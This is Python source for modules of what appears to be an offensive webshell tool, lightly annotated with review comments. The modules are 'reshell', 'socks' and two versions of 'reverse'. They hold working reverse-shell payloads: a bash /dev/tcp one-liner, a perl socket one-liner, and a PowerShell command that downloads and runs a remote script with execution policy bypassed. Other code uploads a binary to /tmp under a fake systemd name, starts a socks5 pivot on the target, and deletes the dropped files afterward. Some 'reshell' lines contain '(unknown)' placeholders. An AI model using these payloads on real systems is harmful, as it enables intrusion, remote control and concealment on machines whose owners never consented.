def run(lhost: str, port: int, mode: int = 0, fakename: str = "/usr/lib/systemd"):
    """
    reshell

    Bind a local port and wait for target connect back to get a full shell.

    eg: reshell {lhost} {port} {type=[python|upload]{1|2},default = 0 (Python:1 Not Python:2)} {(Only for Mode 2) fakename=/usr/lib/systemd}

    Args:
        lhost: address handed to get_php() and used in the mode-2 file name.
        port: local port to bind; a non-numeric value falls back to 23333.
        mode: 0 = auto-detect from has_env("python"); any other value is
            converted with int() and used as-is.
        fakename: argument appended to the uploaded binary's command line
            in mode 2 (default looks like a systemd path).

    Returns:
        False when the Windows check trips; otherwise None, with early
        returns on a disabled proc_open, a failed upload, or a failed
        cleanup send.

    Target-side artifacts (mode 2): a file under /tmp named
    encrypt(f"{lhost}-{port}"), chmod +x'ed and started from /tmp with
    ``fakename`` as its argument. Both the /tmp binary and the argv value
    are the observable footprint of this command on the target.
    """
    # is_windows(False) presumably checks the local side and is_windows()
    # the target (the message says both must be linux) — confirm in helper.
    if (is_windows(False) or is_windows()):
        print(color.red(f"Only for both system is linux."))
        return False
    # Non-numeric port silently becomes 23333 (no message to the operator).
    try:
        port = int(port)
    except ValueError:
        port = 23333
    # PHP disable_functions list cached from the webshell session config.
    disable_func_list = gget("webshell.disable_functions", "webshell")
    MODE = 1
    print(color.yellow(f"Waring: You are using a testing command...."))
    print(color.yellow(f" Please make sure Port {port} open...."))
    if (mode == 0):
        if (has_env("python")):
            print(color.green(f"Traget has python environment."))
            # NOTE(review): `==` is a comparison, not an assignment; MODE
            # keeps the value 1 set above in both auto-detect branches.
            MODE == 1
        else:
            print(color.red(f"Traget has not python environment."))
            MODE == 2
    else:
        MODE = int(mode)
    # The message suggests a mode 3 avoiding proc_open; no such path is
    # selected by the branching below, which only distinguishes MODE 1
    # from everything else.
    if ("proc_open" in disable_func_list):
        print(color.red("proc_open is disabled... Try Mode 3"))
        return
    if (MODE == 1):
        print(color.yellow(f"Use Mode 1->python"))
        # PHP payload built by the project helper; contents not visible here.
        command = get_php(lhost, port)
    else:
        print(color.yellow(f"Use Mode 2->upload"))
        # Remote file name derived from lhost/port via the project's
        # encrypt() helper (exact encoding not visible here).
        filename = encrypt(f"{lhost}-{port}")
        # Ships the bundled x86_64 binary to /tmp/<filename>; the third
        # argument's meaning is defined by upload() — not visible here.
        if not upload(
                path.join(gget("root_path"), "auxiliary", "reshell", "reverse_server_x86_64"),
                "/tmp/%s" % filename, True):
            return
        # NOTE(review): the two "(unknown)" tokens look like placeholders
        # left by extraction of this listing; what the original command
        # referenced at those positions cannot be told from this page.
        command = get_system_code(
            f"cd /tmp && chmod +x (unknown) && ./(unknown) {fakename}", False)
    # Sent on a daemon thread after a 2-second delay, presumably so that
    # bind() below is already listening when the target connects.
    t = Thread(target=delay_send, args=(2, command))
    t.setDaemon(True)
    t.start()
    print(f"Bind port {color.yellow(str(port))}...")
    # bind() owns the listener; its return value only gates the error line.
    if (not bind(port, MODE)):
        print(color.red(f"Bind port error."))
    # Only reachable when the caller passed mode=3 explicitly (auto-detect
    # never yields 3). Same "(unknown)" placeholder as above.
    if (MODE == 3):
        res = send(f"unlink('/tmp/(unknown)');")
        if (not res):
            return
def run(port: int = 8888):
    """
    socks (Only for *unix)

    Run a socks5 server on the target system by python.

    eg: socks {port=8888}

    Args:
        port: port the generated python server (get_python) listens on.

    Returns:
        None. Returns early when the target is Windows, when python is not
        found on the target, when send() yields no response, or when the
        file write reports failure.

    Target-side artifacts: /tmp/check.py is written through PHP
    file_put_contents() from base64-encoded python source, executed with
    ``python /tmp/check.py``, and unlinked by a delayed send 10 s later.
    The python process itself outlives the unlink.
    """
    if (is_windows()):
        print(color.red("Target system isn't *unix"))
        return
    flag = has_env("python")
    if flag:
        # Python source of the socks5 server, produced by the project helper.
        python = get_python(port)
        pyname = "check.py"
        # Source goes over base64 so it survives PHP double-quote parsing.
        res = send(
            f"print(file_put_contents('/tmp/{pyname}', base64_decode(\"{base64_encode(python)}\")));"
        )
        if (not res):
            return
        # PHP's print(false) emits nothing, so an empty body means the
        # write failed; a successful write prints the byte count.
        text = res.r_text.strip()
        if not len(text):
            print(color.red("Failed to write file in /tmp directory."))
            return
        # The interpreter is started via the webshell on a daemon thread;
        # send() is expected to block while the server runs.
        t = Thread(target=send, args=(get_system_code(f"python /tmp/{pyname}"), ))
        t.setDaemon(True)
        t.start()
        # Delayed cleanup of the script file (not of the running process).
        t2 = Thread(target=delay_send, args=(
            10.0,
            f"unlink('/tmp/{pyname}');",
        ))
        t2.setDaemon(True)
        t2.start()
        sleep(1)
        # A thread still alive after 1 s is read as "server is running";
        # a returned send() is read as failure.
        # NOTE(review): Thread.isAlive() was removed in Python 3.9 and
        # raises AttributeError there; setDaemon() is deprecated since 3.10.
        if (t.isAlive()):
            print(
                f"\nStart socks5 server listen on {port} {color.green('success')}.\n"
            )
        else:
            print(f"\nStart socks5 server {color.red('error')}.\n")
    else:
        print(
            color.red(
                "The target host does not exist or cannot be found in the python environment."
            ))
def run(ip: str, port: str, reverse_type: str = "php"):
    """
    reverse

    reverse shell to a host from target system.

    eg: reverse {ip} {port} {type=php}

    reverse_type:
      - bash
      - php
      - python
      - powershell(ps)
      - perl
    (only for *unix)

    Args:
        ip: address the target is told to connect to.
        port: port on that address (kept as str; interpolated verbatim).
        reverse_type: one of the types above, case-insensitive.

    Returns:
        None. Returns early on an unknown type, on a *unix-only type
        against a Windows target, or when python is requested but not
        found on the target.

    Notable target-side behaviour visible in this block: the php type on
    Windows schedules removal of ``<upload_tmp_dir>\\services.exe`` after
    10 s (so get_reverse_php presumably drops that file — confirm); the
    powershell type fetches a script from raw.githubusercontent.com at run
    time and runs it through ``powershell -nop -ep bypass -encodedcommand``
    with a UTF-16LE base64 payload — both are network and command-line
    artifacts a defender can look for.
    """
    reverse_type = str(reverse_type).lower()
    # Only consumed by the php type (and its Windows cleanup); read here
    # unconditionally from the webshell session config.
    upload_tmp_dir = gget("webshell.upload_tmp_dir", "webshell")
    if reverse_type == "bash":
        if (is_windows()):
            print(color.red("Target system is windows"))
            return
        # Classic /dev/tcp one-liner; relies on bash on the target.
        command = f"""bash -c 'bash -i >& /dev/tcp/{ip}/{port} 0>&1'"""
        t = Thread(target=send, args=(get_system_code(command),))
        t.setDaemon(True)
        t.start()
    elif reverse_type == "php":
        # Pure-PHP payload from the project helper; contents not visible here.
        php = get_reverse_php(ip, port, upload_tmp_dir)
        t = Thread(target=send, args=(php,))
        t.setDaemon(True)
        t.start()
        if (is_windows()):
            # Delayed unlink implies a helper binary is written to
            # upload_tmp_dir on Windows — presumably by get_reverse_php.
            t2 = Thread(target=delay_send, args=(
                10.0,
                f"unlink('{upload_tmp_dir}\\\\services.exe');",))
            t2.setDaemon(True)
            t2.start()
    elif reverse_type in ("powershell", "ps"):
        # Download-and-execute of a pinned upstream script; requires
        # outbound HTTPS from the target to GitHub at run time.
        command = '''IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress %s -port %s''' % (ip, port)
        # -encodedcommand expects UTF-16LE base64, hence the explicit encoding.
        command = f"powershell -nop -ep bypass -encodedcommand {base64_encode(command, encoding='utf-16le')}"
        t = Thread(target=send, args=(get_system_code(command),))
        t.setDaemon(True)
        t.start()
    elif reverse_type == "perl":
        if (is_windows()):
            print(color.red("Target system is windows"))
            return
        # ip and port are %-formatted straight into the perl source.
        command = """perl -e 'use Socket;$i="%s";$p=%s;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'""" % (
            ip, port)
        t = Thread(target=send, args=(get_system_code(command),))
        t.setDaemon(True)
        t.start()
    elif reverse_type == "python":
        if has_env("python"):
            # Second argument False to get_system_code: meaning defined by
            # the helper, not visible here.
            t = Thread(target=send, args=(get_system_code(get_reverse_python(ip, port), False),))
            t.setDaemon(True)
            t.start()
        else:
            # (Message rejoined here; the listing had it split across lines.)
            print(
                color.red(
                    "The target host does not exist or cannot be found in the python environment."
                )
            )
            return
    else:
        print(color.red("Reverse type Error."))
        return
    sleep(1)
    # `t` exists on every path that reaches here. A thread still blocked in
    # send() after 1 s is reported as success, a returned one as error.
    # NOTE(review): Thread.isAlive() was removed in Python 3.9 (AttributeError).
    if (t.isAlive()):
        print(f"\nReverse shell to {ip}:{port} {color.green('success')}.\n")
    else:
        print(f"\nReverse shell {color.red('error')}.\n")
def run(ip: str, port: str, reverse_type: str = "php"):
    """
    reverse

    reverse shell to a host from target system.

    eg: reverse {ip} {port} {type=php}

    Args:
        ip: address the target is told to connect to.
        port: port on that address (kept as str; interpolated verbatim).
        reverse_type: "php" or "python", case-insensitive.

    Returns:
        None. Returns early on an unknown type, when python is requested
        but not found on the target, when send() yields no response, or
        when the Windows file write reports failure.

    Target-side artifacts for the python type on Windows:
    ``<upload_tmp_dir>python-update.py`` (note: no separator is inserted
    between the directory and the file name), run with ``python`` through
    the webshell and unlinked by a delayed send 10 s later. On *unix the
    python source is executed directly via get_system_code().
    """
    reverse_type = str(reverse_type).lower()
    if reverse_type == "php":
        # Pure-PHP payload from the project helper; contents not visible here.
        php = get_reverse_php(ip, port)
        t = Thread(target=send, args=(php, ))
        t.setDaemon(True)
        t.start()
    elif reverse_type == "python":
        if has_env("python"):
            python = get_reverse_python(ip, port)
            if is_windows():
                pyname = "python-update.py"
                # Read only in this branch; concatenated without a path
                # separator, so the configured value must carry its own.
                upload_tmp_dir = gget("webshell.upload_tmp_dir", "webshell")
                # The python source is embedded verbatim inside a PHP
                # double-quoted string literal (unlike the base64 path the
                # socks module uses).
                res = send(
                    f"print(file_put_contents('{upload_tmp_dir}{pyname}', \"{python}\"));"
                )
                if (not res):
                    return
                # PHP's print(false) emits nothing, so an empty body means
                # the write failed; success prints the byte count.
                text = res.r_text.strip()
                if not len(text):
                    print(
                        color.red(
                            f"Failed to write file in {upload_tmp_dir if upload_tmp_dir else 'current'} directory."
                        ))
                    return
                # Second argument False to get_system_code: meaning defined
                # by the helper, not visible here.
                t = Thread(target=send, args=(get_system_code(
                    f"python {upload_tmp_dir}{pyname}", False), ))
                t.setDaemon(True)
                t.start()
                # Delayed cleanup of the script file (not of the process).
                t2 = Thread(target=delay_send, args=(
                    10.0,
                    f"unlink('{upload_tmp_dir}{pyname}');",
                ))
                t2.setDaemon(True)
                t2.start()
            else:
                t = Thread(target=send, args=(get_system_code(python, False), ))
                t.setDaemon(True)
                t.start()
        else:
            print(
                color.red(
                    "The target host does not exist or cannot be found in the python environment."
                ))
            return
    else:
        print(color.red("Reverse type Error."))
        return
    sleep(1)
    # `t` exists on every path that reaches here. A thread still blocked in
    # send() after 1 s is reported as success, a returned one as error.
    # NOTE(review): Thread.isAlive() was removed in Python 3.9 (AttributeError).
    if (t.isAlive()):
        print(f"\nReverse shell to {ip}:{port} {color.green('success')}.\n")
    else:
        print(f"\nReverse shell {color.red('error')}.\n")